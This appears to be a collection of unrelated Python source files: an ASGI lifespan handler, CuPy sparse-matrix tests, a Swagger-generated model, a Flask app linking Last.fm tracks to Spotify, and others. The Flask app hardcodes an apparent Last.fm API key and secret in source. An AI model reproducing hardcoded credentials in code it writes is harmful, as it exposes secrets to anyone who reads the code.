exception: typing.Optional[BaseException] = None
def __post_init__(self) -> None:
self.logger = logging.getLogger("mangum.lifespan")
self.loop = asyncio.get_event_loop()
self.app_queue: asyncio.Queue = asyncio.Queue()
self.startup_event: asyncio.Event = asyncio.Event()
self.shutdown_event: asyncio.Event = asyncio.Event()
def __enter__(self) -> None:
"""
Runs the event loop for application startup.
"""
self.loop.create_task(self.run())
self.loop.run_until_complete(self.startup())
def __exit__(
self,
exc_type: typing.Optional[typing.Type[BaseException]],
exc_value: typing.Optional[BaseException],
traceback: typing.Optional[types.TracebackType],
) -> None:
"""
Runs the event loop for application shutdown.
"""
self.loop.run_until_complete(self.shutdown())
async def run(self) -> None:
"""
Calls the application with the `lifespan` connection scope.
"""
try:
await self.app({"type": "lifespan"}, self.receive, self.send)
except LifespanUnsupported:
self.logger.info("ASGI 'lifespan' protocol appears unsupported.")
except (LifespanFailure, UnexpectedMessage) as exc:
self.exception = exc
except BaseException as exc:
self.logger.error("Exception in 'lifespan' protocol.", exc_info=exc)
finally:
self.startup_event.set()
self.shutdown_event.set()
async def receive(self) -> Message:
"""
Awaited by the application to receive ASGI `lifespan` events.
"""
if self.state is LifespanCycleState.CONNECTING:
# Connection established. The next event returned by the queue will be
# `lifespan.startup` to inform the application that the connection is
# ready to receive lfiespan messages.
self.state = LifespanCycleState.STARTUP
elif self.state is LifespanCycleState.STARTUP:
# Connection shutting down. The next event returned by the queue will be
# `lifespan.shutdown` to inform the application that the connection is now
# closing so that it may perform cleanup.
self.state = LifespanCycleState.SHUTDOWN
return await self.app_queue.get()
async def send(self, message: Message) -> None:
"""
Awaited by the application to send ASGI `lifespan` events.
"""
message_type = message["type"]
self.logger.info(
"%s: '%s' event received from application.", self.state, message_type
)
if self.state is LifespanCycleState.CONNECTING:
if self.lifespan == "on":
raise LifespanFailure(
"Lifespan connection failed during startup and lifespan is 'on'."
)
# If a message is sent before the startup event is received by the
# application, then assume that lifespan is unsupported.
self.state = LifespanCycleState.UNSUPPORTED
raise LifespanUnsupported("Lifespan protocol appears unsupported.")
if message_type not in (
"lifespan.startup.complete",
"lifespan.shutdown.complete",
"lifespan.startup.failed",
"lifespan.shutdown.failed",
):
self.state = LifespanCycleState.FAILED
raise UnexpectedMessage(f"Unexpected '{message_type}' event received.")
if self.state is LifespanCycleState.STARTUP:
if message_type == "lifespan.startup.complete":
self.startup_event.set()
elif message_type == "lifespan.startup.failed":
self.state = LifespanCycleState.FAILED
self.startup_event.set()
message = message.get("message", "")
raise LifespanFailure(f"Lifespan startup failure. {message}")
elif self.state is LifespanCycleState.SHUTDOWN:
if message_type == "lifespan.shutdown.complete":
self.shutdown_event.set()
elif message_type == "lifespan.shutdown.failed":
self.state = LifespanCycleState.FAILED
self.shutdown_event.set()
message = message.get("message", "")
raise LifespanFailure(f"Lifespan shutdown failure. {message}")
async def startup(self) -> None:
"""
Pushes the `lifespan` startup event to application queue and handles errors.
"""
self.logger.info("Waiting for application startup.")
await self.app_queue.put({"type": "lifespan.startup"})
await self.startup_event.wait()
if self.state is LifespanCycleState.FAILED:
raise LifespanFailure(self.exception)
if not self.exception:
self.logger.info("Application startup complete.")
else:
self.logger.info("Application startup failed.")
async def shutdown(self) -> None:
"""
Pushes the `lifespan` shutdown event to application queue and handles errors.
"""
self.logger.info("Waiting for application shutdown.")
await self.app_queue.put({"type": "lifespan.shutdown"})
await self.shutdown_event.wait()
if self.state is LifespanCycleState.FAILED:
raise LifespanFailure(self.exception)
|
from gii.core import *
from gii.moai.MOAIEditCanvas import MOAIEditCanvas
from gii.AssetEditor import AssetPreviewer
from gii.qt.helpers import addWidgetWithLayout
from PyQt4 import uic
from PyQt4 import QtGui
def _getModulePath( path ):
import os.path
return os.path.dirname( __file__ ) + '/' + path
class FModPreviewer(AssetPreviewer):
def createWidget(self, container):
self.container = uic.loadUi( _getModulePath('FModPreview.ui') )
self.canvas = addWidgetWithLayout(
MOAIEditCanvas(container),
self.container.canvasContainer
)
self.canvas.loadScript( _getModulePath('FModPreview.lua') )
return self.container
def accept(self, assetNode):
return assetNode.getType() in ('fmod_event')
def onStart(self, assetNode):
atype=assetNode.getType()
self.canvas.safeCallMethod( 'preview', 'setEvent', assetNode.getPath() )
def onStop(self):
self.canvas.safeCallMethod( 'preview', 'setEvent', None )
FModPreviewer().register()
|
# Build Single Element
#
# Create an OpenMC model of just a single lonely fuel element
import numpy
import openmc
import sys; sys.path.append('../..')
import treat
class SingleFuelElementBuilder(treat.CoreBuilder):
def __init__(self, material_lib, name="Single Fuel Element"):
super().__init__(material_lib, 1, name)
self.bc = ["reflective"]*4
def _populate_core_lattice(self):
# 2D active fuel element
fuel_layer = treat.elements.common_layers.get_fuel_layer(
self.manager, self.material_lib)
fuel2d = treat.elements.Element2D.fromLayer(fuel_layer).universe
fuel2d.name = "Fuel 2D"
self.lattice.universes = numpy.array([[fuel2d]], dtype=openmc.Universe)
self._lattice_is_populated = True
if __name__ == "__main__":
library = treat.materials.get_library("NRL")
elem = SingleFuelElementBuilder(library)
elem.lattice.export_to_xml(elem.bc, elem.axially_finite)
|
import unittest
from context import src
from context import config
class TestEnvironment(unittest.TestCase):
def setUp(self):
self.env = src.simulation.environment.Environment(config)
def test_instance(self):
self.assertIsNotNone(self.env)
def test_add_patch(self):
self.env.add_patch()
self.assertIsNotNone(self.env.children)
self.assertTrue(len(self.env.children) > 0)
self.assertIsNotNone(self.env.children[0])
def test_patch_location(self):
for i in range(100):
x, y = self.env.patch_location(10.0)
self.assertTrue((x >= 0.0) and (x <= self.env.length))
self.assertTrue(y >= 0.0 and y <= self.env.width)
def test_create_patches(self):
self.env.children = []
self.env.create_patches()
self.assertGreaterEqual(len(self.env.children), config.getint("ENVIRONMENT", "min_patches"))
self.assertLessEqual(len(self.env.children), config.getint("ENVIRONMENT", "max_patches"))
|
#
# Copyright (C) 2020 IBM. All Rights Reserved.
#
# See LICENSE.txt file in the root directory
# of this source tree for licensing information.
#
import json
import os
from clai.emulator.emulator_docker_bridge import EmulatorDockerBridge
# pylint: disable=too-many-instance-attributes
from clai.server.command_runner.clai_last_info_command_runner import InfoDebug
class EmulatorPresenter:
def __init__(self, emulator_docker_bridge: EmulatorDockerBridge, on_skills_ready, on_server_running,
on_server_stopped):
self.server_running = False
self.server_process = None
self.current_active_skill = ''
self.emulator_docker_bridge = emulator_docker_bridge
self.on_skills_ready = on_skills_ready
self.on_server_running = on_server_running
self.on_server_stopped = on_server_stopped
self.log_value = ""
self.log_read = None
@staticmethod
def __get_base_path():
root_path = os.getcwd()
if 'bin' in root_path:
return '../'
return '.'
def select_skill(self, skill_name: str):
if skill_name == self.current_active_skill:
return
self._send_select(skill_name)
self._send_unselect(self.current_active_skill)
self.request_skills()
def request_skills(self):
self.emulator_docker_bridge.request_skills()
def send_message(self, message):
self.emulator_docker_bridge.send_message(message)
def attach_log(self, chunked_read):
self.log_read = chunked_read
def _send_select(self, skill_name: str):
self.emulator_docker_bridge.select_skill(skill_name)
def _send_unselect(self, skill_name: str):
self.emulator_docker_bridge.unselect_skill(skill_name)
def run_server(self):
self.emulator_docker_bridge.start()
self.server_running = True
self.on_server_running()
self.request_skills()
def stop_server(self):
print(f'is server running {self.server_running}')
if self.server_running:
self.emulator_docker_bridge.stop_server()
self.server_running = False
self.on_server_stopped()
def refresh_files(self):
self.emulator_docker_bridge.refresh_files()
def retrieve_messages(self, add_row):
reply = self.emulator_docker_bridge.retrieve_message()
if reply:
if reply.docker_reply == 'skills':
skills_as_array = reply.message.splitlines()
self.on_skills_ready(skills_as_array[2:-1])
elif reply.docker_reply == 'reply_message':
info_as_string = reply.info[reply.info.index('{'):]
info_as_string = info_as_string[:info_as_string.index('\n')]
print(f"----> {info_as_string}")
info = InfoDebug(**json.loads(info_as_string))
add_row(reply.message, info)
elif reply.docker_reply == 'log':
self.log_value = self.extract_chunk_log(self.log_value, reply.message)
if self.log_read:
self.log_read(self.log_value)
else:
print(f"-----> {reply.docker_reply} : {reply.message}")
@staticmethod
def extract_chunk_log(log_value, message):
if not message:
return ''
log_as_list = log_value.split('\n')
message_as_list = message.split('\n')
new_log = []
if log_as_list.__contains__(message_as_list[0]):
index = log_as_list.index(message_as_list[0])
new_log = message_as_list[(len(log_as_list) - index - 1):]
else:
new_log = message_as_list
return '\n'.join(new_log)
|
import functools
import re
from unittest import mock
import numpy
import pytest
try:
import scipy.sparse
scipy_available = True
except ImportError:
scipy_available = False
import cupy
from cupy import testing
from cupy.cuda import runtime
from cupyx.scipy import sparse
from cupyx.scipy.sparse import _construct
@testing.parameterize(*testing.product({
'dtype': [numpy.float32, numpy.float64, numpy.complex64, numpy.complex128],
'format': ['csr', 'csc', 'coo'],
'm': [3],
'n': [None, 3, 2],
'k': [0, 1],
}))
@testing.with_requires('scipy')
class TestEye:
@testing.numpy_cupy_allclose(sp_name='sp')
def test_eye(self, xp, sp):
x = sp.eye(
self.m, n=self.n, k=self.k, dtype=self.dtype, format=self.format)
assert isinstance(x, sp.spmatrix)
assert x.format == self.format
return x
@testing.parameterize(*testing.product({
'dtype': [numpy.float32, numpy.float64, numpy.complex64, numpy.complex128],
'format': ['csr', 'csc', 'coo'],
}))
@testing.with_requires('scipy')
class TestIdentity:
@testing.numpy_cupy_allclose(sp_name='sp')
def test_eye(self, xp, sp):
x = sp.identity(3, dtype=self.dtype, format=self.format)
assert isinstance(x, sp.spmatrix)
assert x.format == self.format
return x
@testing.parameterize(*testing.product({
'dtype': [numpy.float32, numpy.float64, numpy.complex64, numpy.complex128],
}))
@testing.with_requires('scipy')
class TestSpdiags:
@testing.numpy_cupy_allclose(sp_name='sp')
def test_spdiags(self, xp, sp):
data = xp.arange(12, dtype=self.dtype).reshape(3, 4)
diags = xp.array([0, -1, 2], dtype='i')
x = sp.spdiags(data, diags, 3, 4)
return x
@testing.parameterize(*testing.product({
'dtype': [numpy.float32, numpy.float64]
}))
class TestVstack:
def data(self):
A = sparse.coo_matrix((cupy.asarray([1.0, 2.0, 3.0, 4.0]),
(cupy.asarray([0, 0, 1, 1]),
cupy.asarray([0, 1, 0, 1]))))
B = sparse.coo_matrix((cupy.asarray([5.0, 6.0]),
(cupy.asarray([0, 0]),
cupy.asarray([0, 1]))))
return A, B
def expected(self):
return cupy.asarray([[1, 2],
[3, 4],
[5, 6]], self.dtype)
def test_basic_vstack(self):
A, B = self.data()
actual = _construct.vstack([A, B]).todense()
testing.assert_array_equal(actual, self.expected())
def test_dtype(self):
A, B = self.data()
actual = _construct.vstack([A, B], dtype=self.dtype)
assert actual.dtype == self.dtype
def test_csr(self):
A, B = self.data()
actual = _construct.vstack([A.tocsr(), B.tocsr()]).todense()
testing.assert_array_equal(actual, self.expected())
def test_csr_with_dtype(self):
A, B = self.data()
actual = _construct.vstack([A.tocsr(), B.tocsr()],
dtype=self.dtype)
assert actual.dtype == self.dtype
assert actual.indices.dtype == cupy.int32
assert actual.indptr.dtype == cupy.int32
@testing.parameterize(*testing.product({
'dtype': [numpy.float32, numpy.float64]
}))
class TestHstack:
def data(self):
A = sparse.coo_matrix((cupy.asarray([1.0, 2.0, 3.0, 4.0]),
(cupy.asarray([0, 0, 1, 1]),
cupy.asarray([0, 1, 0, 1]))))
B = sparse.coo_matrix((cupy.asarray([5.0, 6.0]),
(cupy.asarray([0, 1]),
cupy.asarray([0, 0]))))
return A, B
def expected(self):
return cupy.asarray([[1, 2, 5],
[3, 4, 6]])
def test_basic_hstack(self):
A, B = self.data()
actual = _construct.hstack([A, B], dtype=self.dtype).todense()
testing.assert_array_equal(actual, self.expected())
assert actual.dtype == self.dtype
def test_csc(self):
A, B = self.data()
actual = _construct.hstack([A.tocsc(), B.tocsc()],
dtype=self.dtype).todense()
testing.assert_array_equal(actual, self.expected())
assert actual.dtype == self.dtype
def test_csc_with_dtype(self):
A, B = self.data()
actual = _construct.hstack([A.tocsc(), B.tocsc()],
dtype=self.dtype)
assert actual.indices.dtype == cupy.int32
assert actual.indptr.dtype == cupy.int32
@testing.parameterize(*testing.product({
'dtype': [numpy.float32, numpy.float64]
}))
class TestBmat:
def data(self):
A = sparse.csr_matrix(cupy.asarray([[1, 2], [3, 4]],
self.dtype)).tocoo()
B = sparse.csr_matrix(cupy.asarray([[5], [6]],
self.dtype)).tocoo()
C = sparse.csr_matrix(cupy.asarray([[7]],
self.dtype)).tocoo()
D = sparse.coo_matrix((0, 0), dtype=self.dtype)
return A, B, C, D
def test_basic_inputs(self):
A, B, C, D = self.data()
expected = cupy.asarray([[1, 2, 5],
[3, 4, 6],
[0, 0, 7]], dtype=self.dtype)
testing.assert_array_equal(
_construct.bmat([[A, B], [None, C]]).todense(), expected
)
expected = cupy.asarray([[1, 2, 0],
[3, 4, 0],
[0, 0, 7]])
testing.assert_array_equal(
_construct.bmat([[A, None], [None, C]]).todense(), expected
)
expected = cupy.asarray([[0, 5],
[0, 6],
[7, 0]])
testing.assert_array_equal(
_construct.bmat([[None, B], [C, None]]).todense(), expected
)
def test_empty(self):
A, B, C, D = self.data()
expected = cupy.empty((0, 0), dtype=self.dtype)
testing.assert_array_equal(_construct.bmat([[None, None]]).todense(),
expected)
testing.assert_array_equal(_construct.bmat([[None, D], [D, None]])
.todense(), expected)
def test_edge_cases(self):
"""Catch-all for small edge cases"""
A, B, C, D = self.data()
expected = cupy.asarray([[7]], dtype=self.dtype)
testing.assert_array_equal(_construct.bmat([[None, D], [C, None]])
.todense(), expected)
def test_failure_cases(self):
A, B, C, D = self.data()
match = r'.*Got blocks\[{}\]\.shape\[{}\] == 1, expected 2'
# test failure cases
message1 = re.compile(match.format('1,0', '1'))
with pytest.raises(ValueError, match=message1):
_construct.bmat([[A], [B]], dtype=self.dtype)
message2 = re.compile(match.format('0,1', '0'))
with pytest.raises(ValueError, match=message2):
_construct.bmat([[A, C]], dtype=self.dtype)
@testing.parameterize(*testing.product({
'random_method': ['random', 'rand'],
'dtype': [numpy.float32, numpy.float64],
'format': ['csr', 'csc', 'coo'],
}))
class TestRandom:
def test_random(self):
x = getattr(sparse, self.random_method)(
3, 4, density=0.1,
format=self.format, dtype=self.dtype)
assert x.shape == (3, 4)
assert x.dtype == self.dtype
assert x.format == self.format
def test_random_with_seed(self):
x = getattr(sparse, self.random_method)(
3, 4, density=0.1,
format=self.format, dtype=self.dtype,
random_state=1)
assert x.shape == (3, 4)
assert x.dtype == self.dtype
assert x.format == self.format
y = getattr(sparse, self.random_method)(
3, 4, density=0.1,
format=self.format, dtype=self.dtype,
random_state=1)
testing.assert_array_equal(x.toarray(), y.toarray())
def test_random_with_state(self):
state1 = cupy.random.RandomState(1)
x = getattr(sparse, self.random_method)(
3, 4, density=0.1,
format=self.format, dtype=self.dtype,
random_state=state1)
assert x.shape == (3, 4)
assert x.dtype == self.dtype
assert x.format == self.format
state2 = cupy.random.RandomState(1)
y = getattr(sparse, self.random_method)(
3, 4, density=0.1,
format=self.format, dtype=self.dtype,
random_state=state2)
testing.assert_array_equal(x.toarray(), y.toarray())
def test_random_with_data_rvs(self):
if self.random_method == 'rand':
pytest.skip('cupyx.scipy.sparse.rand does not support data_rvs')
data_rvs = mock.MagicMock(side_effect=cupy.zeros)
x = getattr(sparse, self.random_method)(
3, 4, density=0.1, data_rvs=data_rvs,
format=self.format, dtype=self.dtype)
assert x.shape == (3, 4)
assert x.dtype == self.dtype
assert x.format == self.format
assert data_rvs.call_count == 1
# Note that its value is generated randomly
assert isinstance(data_rvs.call_args[0][0], int)
@testing.with_requires('scipy')
class TestRandomInvalidArgument:
def test_too_small_density(self):
for sp in (scipy.sparse, sparse):
with pytest.raises(ValueError):
sp.random(3, 4, density=-0.1)
def test_too_large_density(self):
for sp in (scipy.sparse, sparse):
with pytest.raises(ValueError):
sp.random(3, 4, density=1.1)
def test_invalid_dtype(self):
# Note: SciPy 1.12+ accepts integer.
with pytest.raises(NotImplementedError):
sparse.random(3, 4, dtype='i')
@testing.parameterize(*testing.product({
'dtype': [numpy.float32, numpy.float64, numpy.complex64, numpy.complex128],
'format': ['dia', 'csr', 'csc', 'coo'],
}))
@testing.with_requires('scipy')
class TestDiags:
@testing.numpy_cupy_allclose(sp_name='sp')
def test_diags_scalar_offset(self, xp, sp):
x = sp.diags(
xp.arange(16), offsets=0, dtype=self.dtype, format=self.format)
assert isinstance(x, sp.spmatrix)
assert x.format == self.format
return x
@testing.numpy_cupy_allclose(sp_name='sp')
def test_diags_single_element_lists(self, xp, sp):
x = sp.diags(
[xp.arange(16)], offsets=[0], dtype=self.dtype, format=self.format)
assert isinstance(x, sp.spmatrix)
assert x.format == self.format
return x
@testing.numpy_cupy_allclose(sp_name='sp')
def test_diags_multiple(self, xp, sp):
x = sp.diags(
[xp.arange(15), xp.arange(16), xp.arange(15), xp.arange(13)],
offsets=[-1, 0, 1, 3],
dtype=self.dtype, format=self.format)
assert isinstance(x, sp.spmatrix)
assert x.format == self.format
return x
@testing.numpy_cupy_allclose(sp_name='sp')
def test_diags_offsets_as_array(self, xp, sp):
x = sp.diags(
[xp.arange(15), xp.arange(16), xp.arange(15), xp.arange(13)],
offsets=xp.array([-1, 0, 1, 3]),
dtype=self.dtype, format=self.format)
assert isinstance(x, sp.spmatrix)
assert x.format == self.format
return x
@testing.numpy_cupy_allclose(sp_name='sp')
def test_diags_non_square(self, xp, sp):
x = sp.diags(
[xp.arange(5), xp.arange(3)],
offsets=[0, -2], shape=(5, 10),
dtype=self.dtype, format=self.format)
assert isinstance(x, sp.spmatrix)
assert x.format == self.format
return x
# borrowed from scipy:
_arrs_kron = [
[[0]],
[[-1]],
[[4]],
[[10]],
[[0], [0]],
[[0, 0]],
[[1, 2], [3, 4]],
[[0, 2], [5, 0]],
[[0, 2, -6], [8, 0, 14]],
[[5, 4], [0, 0], [6, 0]],
[[5, 4, 4], [1, 0, 0], [6, 0, 8]],
[[0, 1, 0, 2, 0, 5, 8]],
[[0.5, 0.125, 0, 3.25], [0, 2.5, 0, 0]], ]
def skip_HIP_0_size_matrix():
def decorator(impl):
@functools.wraps(impl)
def test_func(self, *args, **kw):
try:
impl(self, *args, **kw)
except AssertionError as e:
if runtime.is_hip:
assert 'ValueError: hipSPARSE' in str(e)
pytest.xfail('may be buggy')
raise
return test_func
return decorator
@testing.parameterize(*testing.product({
'dtype': (numpy.float32, numpy.float64, numpy.complex64, numpy.complex128),
'format': ('csr', 'csc', 'coo'),
'arrA': _arrs_kron,
'arrB': _arrs_kron,
}))
@testing.with_requires('scipy>=1.6')
class TestKron:
def _make_sp_mat(self, xp, sp, arr, dtype):
a = xp.array(arr, dtype=dtype)
a = sp.csr_matrix(a)
return a
@skip_HIP_0_size_matrix()
@testing.numpy_cupy_allclose(sp_name='sp')
def test_kron(self, xp, sp):
a = self._make_sp_mat(xp, sp, self.arrA, self.dtype)
b = self._make_sp_mat(xp, sp, self.arrB, self.dtype)
kron = sp.kron(a, b, format=self.format)
assert kron.shape == (a.shape[0] * b.shape[0], a.shape[1] * b.shape[1])
assert kron.nnz == a.nnz * b.nnz
return kron
# TODO(leofang): check oversize inputs as in scipy/scipy#11879 after
# #3513 is fixed
_arrs_kronsum = [
[[0]],
[[-1]],
[[4]],
[[10]],
[[1, 2], [3, 4]],
[[0, 2], [5, 0]],
[[0, 2, -6], [8, 0, 14], [0, 3, 0]],
[[5, 4, 4], [1, 0, 0], [6, 0, 8]]]
@testing.parameterize(*testing.product({
'dtype': (numpy.float32, numpy.float64, numpy.complex64, numpy.complex128),
'format': ('csr', 'csc', 'coo'),
'arrA': _arrs_kronsum,
'arrB': _arrs_kronsum,
}))
@testing.with_requires('scipy>=1.6')
class TestKronsum:
def _make_sp_mat(self, xp, sp, arr, dtype):
a = xp.array(arr, dtype=dtype)
a = sp.csr_matrix(a)
return a
@skip_HIP_0_size_matrix()
@testing.numpy_cupy_allclose(sp_name='sp')
def test_kronsum(self, xp, sp):
a = self._make_sp_mat(xp, sp, self.arrA, self.dtype)
b = self._make_sp_mat(xp, sp, self.arrB, self.dtype)
kronsum = sp.kronsum(a, b, format=self.format)
assert kronsum.shape == (a.shape[0] * b.shape[0],
a.shape[1] * b.shape[1])
return kronsum
|
from datetime import datetime
from flask import Flask, render_template
import json
import requests
from spotify_api.api import SpotifyApi
app = Flask(__name__)
s_api = SpotifyApi()
LASTFM_API_KEY = "b9ba81a4f80bbff4fa3fcf7df609947e"
LASTFM_API_SECRET = "65f9cf1308e52e3369c5eeb992fa846a"
def getRecentTracks(user):
url = "http://ws.audioscrobbler.com/2.0/"
payload = {"api_key": LASTFM_API_KEY,
"method": "user.getrecenttracks",
"user": user,
"format": "json"}
response = requests.get(url, params = payload)
app.logger.debug(response.url)
if response.status_code != 200:
raise Exception("Panic! Cannot call lastfm user.getrecentracks!")
#process response
data = json.loads(response.text)
return data['recenttracks']['track']
def isArtistOfAlbum(spotify_album, artist_name):
for a in spotify_album.artists:
if a.name == artist_name:
return True
return False
def getSpotifyLink(album_name, artist_name):
"""
album_name: str
artist_name: str
"""
#TODO: Use advanced search
#Search for albums in Spotify
albums = s_api.albums.search(album_name)
#Look in search results for best first fit
for album in albums:
if isArtistOfAlbum(album, artist_name):
return album.href
print "Unknown for: %s" % (album_name)
return "Unknown"
@app.route("/<username>")
def index(username):
#get recent tracks of user
app.logger.debug("Get recent tracks from user... %d" % datetime.now().second)
tracks = getRecentTracks(username)
#get unique album names
albums = dict()
for track in tracks:
try:
albums[track['album']['#text']] = track['artist']['#text']
except AttributeError:
pass
#Get Spotify links and collect data
app.logger.debug("Look for Spotify links... %d" % datetime.now().second)
album_data = [(album_name, getSpotifyLink(album_name, artist_name))
for album_name, artist_name
in albums.items()]
print album_data
app.logger.debug("Render template... %d" % datetime.now().second)
return render_template("index.html", albums = album_data)
if __name__=="__main__":
app.run(debug = True)
|
# coding: utf-8
"""
syntropy-controller
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen) # noqa: E501
OpenAPI spec version: 0.1.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class GetAgentsRequestFilterV1(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
"agent_id": "list[float]",
"agent_provider_name": "list[str]",
"agent_type": "list[GetAgentsRequestFilterAgentTypeV1]",
"agent_version": "list[str]",
"agent_tag_name": "list[str]",
"agent_status": "list[GetAgentsRequestFilterAgentStatusV1]",
"agent_location_country": "list[str]",
"agent_modified_at_from": "datetime",
"agent_modified_at_to": "datetime",
}
attribute_map = {
"agent_id": "agent_id",
"agent_provider_name": "agent_provider_name",
"agent_type": "agent_type",
"agent_version": "agent_version",
"agent_tag_name": "agent_tag_name",
"agent_status": "agent_status",
"agent_location_country": "agent_location_country",
"agent_modified_at_from": "agent_modified_at_from",
"agent_modified_at_to": "agent_modified_at_to",
}
def __init__(
self,
agent_id=None,
agent_provider_name=None,
agent_type=None,
agent_version=None,
agent_tag_name=None,
agent_status=None,
agent_location_country=None,
agent_modified_at_from=None,
agent_modified_at_to=None,
): # noqa: E501
"""GetAgentsRequestFilterV1 - a model defined in Swagger""" # noqa: E501
self._agent_id = None
self._agent_provider_name = None
self._agent_type = None
self._agent_version = None
self._agent_tag_name = None
self._agent_status = None
self._agent_location_country = None
self._agent_modified_at_from = None
self._agent_modified_at_to = None
self.discriminator = None
if agent_id is not None:
self.agent_id = agent_id
if agent_provider_name is not None:
self.agent_provider_name = agent_provider_name
if agent_type is not None:
self.agent_type = agent_type
if agent_version is not None:
self.agent_version = agent_version
if agent_tag_name is not None:
self.agent_tag_name = agent_tag_name
if agent_status is not None:
self.agent_status = agent_status
if agent_location_country is not None:
self.agent_location_country = agent_location_country
if agent_modified_at_from is not None:
self.agent_modified_at_from = agent_modified_at_from
if agent_modified_at_to is not None:
self.agent_modified_at_to = agent_modified_at_to
@property
def agent_id(self):
"""Gets the agent_id of this GetAgentsRequestFilterV1. # noqa: E501
:return: The agent_id of this GetAgentsRequestFilterV1. # noqa: E501
:rtype: list[float]
"""
return self._agent_id
@agent_id.setter
def agent_id(self, agent_id):
"""Sets the agent_id of this GetAgentsRequestFilterV1.
:param agent_id: The agent_id of this GetAgentsRequestFilterV1. # noqa: E501
:type: list[float]
"""
self._agent_id = agent_id
@property
def agent_provider_name(self):
"""Gets the agent_provider_name of this GetAgentsRequestFilterV1. # noqa: E501
:return: The agent_provider_name of this GetAgentsRequestFilterV1. # noqa: E501
:rtype: list[str]
"""
return self._agent_provider_name
@agent_provider_name.setter
def agent_provider_name(self, agent_provider_name):
"""Sets the agent_provider_name of this GetAgentsRequestFilterV1.
:param agent_provider_name: The agent_provider_name of this GetAgentsRequestFilterV1. # noqa: E501
:type: list[str]
"""
self._agent_provider_name = agent_provider_name
@property
def agent_type(self):
"""Gets the agent_type of this GetAgentsRequestFilterV1. # noqa: E501
:return: The agent_type of this GetAgentsRequestFilterV1. # noqa: E501
:rtype: list[GetAgentsRequestFilterAgentTypeV1]
"""
return self._agent_type
@agent_type.setter
def agent_type(self, agent_type):
"""Sets the agent_type of this GetAgentsRequestFilterV1.
:param agent_type: The agent_type of this GetAgentsRequestFilterV1. # noqa: E501
:type: list[GetAgentsRequestFilterAgentTypeV1]
"""
self._agent_type = agent_type
@property
def agent_version(self):
"""Gets the agent_version of this GetAgentsRequestFilterV1. # noqa: E501
:return: The agent_version of this GetAgentsRequestFilterV1. # noqa: E501
:rtype: list[str]
"""
return self._agent_version
@agent_version.setter
def agent_version(self, agent_version):
"""Sets the agent_version of this GetAgentsRequestFilterV1.
:param agent_version: The agent_version of this GetAgentsRequestFilterV1. # noqa: E501
:type: list[str]
"""
self._agent_version = agent_version
@property
def agent_tag_name(self):
"""Gets the agent_tag_name of this GetAgentsRequestFilterV1. # noqa: E501
:return: The agent_tag_name of this GetAgentsRequestFilterV1. # noqa: E501
:rtype: list[str]
"""
return self._agent_tag_name
@agent_tag_name.setter
def agent_tag_name(self, agent_tag_name):
"""Sets the agent_tag_name of this GetAgentsRequestFilterV1.
:param agent_tag_name: The agent_tag_name of this GetAgentsRequestFilterV1. # noqa: E501
:type: list[str]
"""
self._agent_tag_name = agent_tag_name
@property
def agent_status(self):
"""Gets the agent_status of this GetAgentsRequestFilterV1. # noqa: E501
:return: The agent_status of this GetAgentsRequestFilterV1. # noqa: E501
:rtype: list[GetAgentsRequestFilterAgentStatusV1]
"""
return self._agent_status
@agent_status.setter
def agent_status(self, agent_status):
"""Sets the agent_status of this GetAgentsRequestFilterV1.
:param agent_status: The agent_status of this GetAgentsRequestFilterV1. # noqa: E501
:type: list[GetAgentsRequestFilterAgentStatusV1]
"""
self._agent_status = agent_status
@property
def agent_location_country(self):
"""Gets the agent_location_country of this GetAgentsRequestFilterV1. # noqa: E501
:return: The agent_location_country of this GetAgentsRequestFilterV1. # noqa: E501
:rtype: list[str]
"""
return self._agent_location_country
@agent_location_country.setter
def agent_location_country(self, agent_location_country):
"""Sets the agent_location_country of this GetAgentsRequestFilterV1.
:param agent_location_country: The agent_location_country of this GetAgentsRequestFilterV1. # noqa: E501
:type: list[str]
"""
self._agent_location_country = agent_location_country
@property
def agent_modified_at_from(self):
"""Gets the agent_modified_at_from of this GetAgentsRequestFilterV1. # noqa: E501
:return: The agent_modified_at_from of this GetAgentsRequestFilterV1. # noqa: E501
:rtype: datetime
"""
return self._agent_modified_at_from
@agent_modified_at_from.setter
def agent_modified_at_from(self, agent_modified_at_from):
"""Sets the agent_modified_at_from of this GetAgentsRequestFilterV1.
:param agent_modified_at_from: The agent_modified_at_from of this GetAgentsRequestFilterV1. # noqa: E501
:type: datetime
"""
self._agent_modified_at_from = agent_modified_at_from
@property
def agent_modified_at_to(self):
"""Gets the agent_modified_at_to of this GetAgentsRequestFilterV1. # noqa: E501
:return: The agent_modified_at_to of this GetAgentsRequestFilterV1. # noqa: E501
:rtype: datetime
"""
return self._agent_modified_at_to
@agent_modified_at_to.setter
def agent_modified_at_to(self, agent_modified_at_to):
"""Sets the agent_modified_at_to of this GetAgentsRequestFilterV1.
:param agent_modified_at_to: The agent_modified_at_to of this GetAgentsRequestFilterV1. # noqa: E501
:type: datetime
"""
self._agent_modified_at_to = agent_modified_at_to
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(
map(lambda x: x.to_dict() if hasattr(x, "to_dict") else x, value)
)
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(
map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict")
else item,
value.items(),
)
)
else:
result[attr] = value
if issubclass(GetAgentsRequestFilterV1, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, GetAgentsRequestFilterV1):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
|
from IProcess import IProcess, EDataType
from PIL import Image
import numpy as np
import math
import cv2
class CropImageByClass(IProcess):
def __init__(self):
IProcess.__init__(self)
self.cropped = True
def getType(self):
return EDataType.CroppedPic
def toId(self):
return str(__class__.__name__)
def do(self, imageData):
IProcess.do(self, imageData)
self.data = [] # Delete previous data.
className = imageData.classifiedAs
img = np.array(imageData.data[0]) # STUB: Only tested with grayscale images.
maxarea = 0
max2 = 0
'''
PARAMETERS for classes:
'''
minThresholdValue = 0
